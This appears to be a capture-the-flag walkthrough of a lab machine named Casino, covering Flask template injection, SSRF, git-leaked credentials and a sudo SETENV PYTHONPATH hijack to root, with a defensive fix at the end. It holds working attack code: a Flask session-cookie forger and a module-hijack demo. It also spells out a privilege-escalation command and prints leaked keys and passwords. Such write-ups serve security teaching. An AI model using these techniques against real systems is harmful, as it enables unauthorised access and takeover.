⇒ Casino is a medium-difficulty Linux machine that teaches us about:
- Flask SSTI [ Server Side Template Injection ]
- SSRF [ Server Side Request Forgery ]
- Python sudo SETENV abuse to hijack a library being imported.
Enumerating and performing SSTI
⇒ When we visit the website we find the employees working there and a few more names in the banned list.
- So we have a user list now:
grey, Carla, Erlich, Blockman, Phil, Alan, Stu, Mr.Chow, Doug
⇒ After looking around we see that the search field is vulnerable to SSTI: a simple arithmetic test expression is evaluated server-side and comes back as 49. We then dump the items of the Flask config object through the template.
- So we got the secret key: i_L0v3$$$
⇒ With the secret key from the config we can sign our own Flask session cookie and log in as the Erlich user. When we try to play the game we get the following page:
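The cookie-signing step above is what the leaked secret key buys us. The following is an added example (not code from the original writeup or from the Casino box) that forges and verifies a Flask session cookie with only the standard library. It assumes Flask's default session settings (itsdangerous URL-safe timestamped signer, salt "cookie-session", HMAC key derivation, SHA-1) and that the application keys the session on a "username" field; the key, the field name and the target user are taken from the writeup.

```python
"""Forge and verify a Flask client-side session cookie from a leaked SECRET_KEY.

Reimplements the itsdangerous URLSafeTimedSerializer format that Flask uses by
default: <payload>.<timestamp>.<signature>, all URL-safe base64 without padding,
payload optionally zlib-compressed (marked by a leading ".").
"""
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

SALT = b"cookie-session"  # Flask's default session salt
LEAKED_KEY = "i_L0v3$$$"  # value read out of the Flask config via SSTI


def _b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _signing_key(secret_key: str) -> bytes:
    # itsdangerous "hmac" key derivation: HMAC-SHA1(secret_key, salt)
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()


def _sign(secret_key: str, value: str) -> str:
    return _b64e(hmac.new(_signing_key(secret_key), value.encode(), hashlib.sha1).digest())


def forge_session(secret_key: str, session: dict, timestamp: Optional[int] = None) -> str:
    """Build a cookie the server will accept as a genuine session."""
    raw = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    packed = zlib.compress(raw)
    if len(packed) < len(raw) - 1:  # itsdangerous compresses only when it pays off
        payload = "." + _b64e(packed)
    else:
        payload = _b64e(raw)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_b64 = _b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    body = f"{payload}.{ts_b64}"
    return f"{body}.{_sign(secret_key, body)}"


def read_session(secret_key: str, cookie: str) -> Optional[dict]:
    """Verify the signature and decode the payload; None if the MAC does not match."""
    body, _, sig = cookie.rpartition(".")
    if not body or not hmac.compare_digest(_sign(secret_key, body), sig):
        return None
    payload, _, _ts = body.rpartition(".")
    if payload.startswith("."):
        raw = zlib.decompress(_b64d(payload[1:]))
    else:
        raw = _b64d(payload)
    return json.loads(raw)


if __name__ == "__main__":
    # "username" is an assumed session field; the real app's field name is not on the page.
    print(forge_session(LEAKED_KEY, {"username": "Erlich"}))
```

Paste the printed value as the `session` cookie in the browser or in Burp. A cookie signed with any other key fails `read_session` the same way it would fail the server, which is also the quick check that the key you dumped is really the one the app signs with.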
⇒ Intercepting the request we notice something interesting: a BTC parameter that contains a URL. We previously saw that port 9000/tcp was filtered, so it is probably only reachable from the box itself. We pointed the parameter at that port through this request and it worked (SSRF):
- On the /admin page there's an option that allows us to execute commands on the system:
- We ran the id command and saw that the commands run as the user grey.
- We popped a shell as user grey:
Privilege Escalation (grey to carla)
⇒ There's a git repository in the adminPanel folder.
- Running git show we find a commit that contains carla's password:
carla : >F73SzS36>V$tJmc
- We switched to carla :
Privilege Escalation (carla to root)
⇒ We can run a python script as root via sudo, and the sudo rule also grants SETENV:
- Reading the python script, it only does simple things; nothing vulnerable in the script itself.
⇒ But SETENV lets us pass environment variables through sudo, including PYTHONPATH, and python searches PYTHONPATH directories before the standard library. We can use this to hijack the datetime module the script imports.
- Create datetime.py in /dev/shm containing a python reverse shell.
- Run the script as root with PYTHONPATH pointing to /dev/shm:
sudo PYTHONPATH=/dev/shm /opt/updateBTCPrice.py
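The steps above can be reproduced locally without sudo to see exactly why the hijack works. This is an added example, not code from the original writeup: it writes a stand-in for /opt/updateBTCPrice.py (assumed to do nothing more than import datetime), drops a rogue datetime.py into a temporary directory that stands in for /dev/shm, and runs the victim with PYTHONPATH pointing at it. The rogue module writes a marker file instead of spawning a reverse shell, then hands off to the real stdlib datetime so the victim script finishes normally, which is what you want when the real target is a root cron job or a script someone is watching.

```python
"""Local reproduction of the sudo SETENV / PYTHONPATH module hijack (no sudo needed)."""
import os
import subprocess
import sys
import tempfile
import textwrap

# Stand-in for /opt/updateBTCPrice.py (assumption: the only thing that matters is `import datetime`).
VICTIM = textwrap.dedent("""\
    import datetime
    print("year:", datetime.datetime.now().year)
""")

# The rogue datetime.py. Payload here is a marker file recording the uid it ran as;
# on the box this is where the reverse shell goes. After the payload it removes its
# own directory from sys.path and re-imports the genuine module, so the caller's
# `import datetime` ends up bound to the real stdlib module and the script keeps working.
HIJACK = textwrap.dedent("""\
    import importlib, os, sys
    with open(os.environ["HIJACK_MARKER"], "w") as f:
        f.write("uid=%d" % os.getuid())
    _here = os.path.dirname(os.path.abspath(__file__))
    sys.path[:] = [p for p in sys.path if os.path.abspath(p or ".") != _here]
    del sys.modules["datetime"]          # drop ourselves so the import machinery looks again
    importlib.import_module("datetime")  # real module now replaces us in sys.modules
""")


def _run(victim: str, env: dict) -> dict:
    proc = subprocess.run([sys.executable, victim], env=env, capture_output=True, text=True)
    marker = env["HIJACK_MARKER"]
    return {
        "returncode": proc.returncode,
        "stdout": proc.stdout.strip(),
        "marker": open(marker).read() if os.path.exists(marker) else None,
    }


def run_hijack_demo() -> dict:
    """Run the victim once normally and once with PYTHONPATH=<rogue dir>; return both results."""
    with tempfile.TemporaryDirectory() as tmp:
        victim = os.path.join(tmp, "updateBTCPrice.py")
        rogue_dir = os.path.join(tmp, "shm")  # stands in for /dev/shm
        os.mkdir(rogue_dir)
        with open(victim, "w") as f:
            f.write(VICTIM)
        with open(os.path.join(rogue_dir, "datetime.py"), "w") as f:
            f.write(HIJACK)

        base_env = {k: v for k, v in os.environ.items() if k != "PYTHONPATH"}
        base_env["HIJACK_MARKER"] = os.path.join(tmp, "marker_baseline")
        baseline = _run(victim, base_env)

        # Equivalent of: sudo PYTHONPATH=/dev/shm /opt/updateBTCPrice.py (minus the sudo).
        hijack_env = dict(base_env, PYTHONPATH=rogue_dir, HIJACK_MARKER=os.path.join(tmp, "marker_hijacked"))
        hijacked = _run(victim, hijack_env)

        return {"baseline": baseline, "hijacked": hijacked}


if __name__ == "__main__":
    for name, result in run_hijack_demo().items():
        print(name, result)
```

Baseline produces no marker; the PYTHONPATH run produces one while the victim still prints its year and exits 0, so nothing in the script's own output reveals the hijack. The fix on the defending side is to not grant SETENV in the sudo rule at all; if the environment really must be passed through, `#!/usr/bin/python3 -I` on the script (isolated mode ignores PYTHONPATH and the script directory) closes this specific path.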